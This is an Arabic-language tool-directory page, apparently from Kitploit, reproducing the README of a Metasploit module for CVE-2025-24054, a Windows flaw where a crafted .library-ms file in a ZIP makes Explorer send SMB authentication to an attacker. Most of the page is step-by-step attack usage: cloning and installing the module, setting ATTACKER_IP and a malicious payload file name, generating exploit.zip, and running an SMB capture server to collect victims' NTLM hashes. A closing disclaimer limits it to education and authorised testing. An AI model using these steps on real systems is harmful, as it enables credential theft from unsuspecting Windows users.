Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24054-24071---Metasploit-Module — وحدة Metasploit لاستغلال CVE-2025-24054 (سابقًا 24071). إكسبلويت تسريب NTLM مدمج في Metasploit لهجمات قائمة على مكتبات Windows. | Kitploit
أدوات/GitHubGitHub/securitylayer404/cve-2025-24054-24071---metasploit-module
أطر الاستغلالتوليد الحمولةالاستغلالاختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubsecuritylayer404/cve-2025-24054-24071---metasploit-module

CVE-2025-24054-24071---Metasploit-Module

وحدة Metasploit لاستغلال CVE-2025-24054 (سابقًا 24071). إكسبلويت تسريب NTLM مدمج في Metasploit لهجمات قائمة على مكتبات Windows.

عرض المستودع
1منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24054/24071 - وحدة Metasploit

نظرة عامة

تحدث الثغرة أثناء عملية استخراج ملف .zip. عند التفاعل مع ملف .library-ms مصمم خصيصًا، يقوم مستكشف Windows (Explorer) بمعالجة مخطط XML الداخلي ويبدأ تلقائيًا طلب مصادقة SMB نحو مسار بعيد يتحكم فيه المهاجم.

يتيح هذا السلوك تسريب تجزئة NTLM الخاصة بالمستخدم دون الحاجة إلى أي تفاعل إضافي يتجاوز فك ضغط الملف. لمشاهدة إثبات المفهوم، أنصحك بزيارة الرابط التالي: Fluffy - HTB.

⚠️ ملاحظة مهمة:

على الرغم من أن هذه الثغرة نُشرت في الأصل باسم CVE-2025-24071، إلا أنها تُتتبع حاليًا رسميًا باسم CVE-2025-24054.

📌 التثبيت

استنساخ المستودع:

root@kitploit:~
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071

نسخ الوحدة إلى دليل Metasploit:

root@kitploit:~
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/

إذا لم يكن الدليل موجودًا، فأنشئه باستخدام:

root@kitploit:~
❯ mkdir -p ~/.msf4/modules/auxiliary/server/

ثم أعد نسخ الوحدة.

📌 الاستخدام

شغّل Metasploit وحمّل الوحدة:

root@kitploit:~
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak

إذا تم تحميل الوحدة بنجاح، سترى الخيارات المتاحة لتكوينها:

root@kitploit:~
❯ show options

Module options (auxiliary/server/ntlm_hash_leak):

   Name          Current Setting       Required  Description

   ----          ---------------       --------  -----------

   ATTACKER_IP                         yes       IP del atacante (donde corre Responder/Impacket)

   FILENAME      exploit.zip           yes       El nombre del archivo ZIP

   LIBRARY_NAME  documents.library-ms  yes       Nombre del archivo .library-ms

   SHARE_NAME    recurso               yes       Nombre del recurso compartido ficticio

قم بتكوين الوحدة ثم نفّذها:

root@kitploit:~
❯ set ATTACKER_IP 0.0.0.0  # Reemplaza con tu IP atacante

❯ set FILENAME exploit.zip  # Nombre del payload que subiras al SMB (equipo objetivo)

❯ set LIBRARY_NAME malicious.library-ms  # Nombre de .library-ms file

❯ set SHARE_NAME it_shared  # Nombre del recurso SMB

❯ run

Output: el módulo genera un archivo .zip que debe ser subido al servidor SMB objetivo para su posterior ejecución por parte de la víctima

root@kitploit:~
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed

أخيرًا، استخدم وحدة التقاط SMB في Metasploit لاستقبال تجزئات NTLM:

root@kitploit:~
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0  # Reemplaza con tu IP atacante
❯ run

إذا واجهت مشاكل في تشغيل خادم SMB من Metasploit:

  • شغّل msfconsole بصلاحيات root
  • تأكد من أن الملف ntlm_hash_leak.rb لديه الصلاحيات المناسبة ليتمكن root من الوصول إليه

⚠️ تحذير

طُوّرت هذه الوحدة لأغراض تعليمية وللاختبارات المصرح بها فقط. الاستخدام غير المصرح به لهذا النوع من الأدوات قد يكون غير قانوني.

🕷 المؤلف

Security Layer

تنزيل الأداة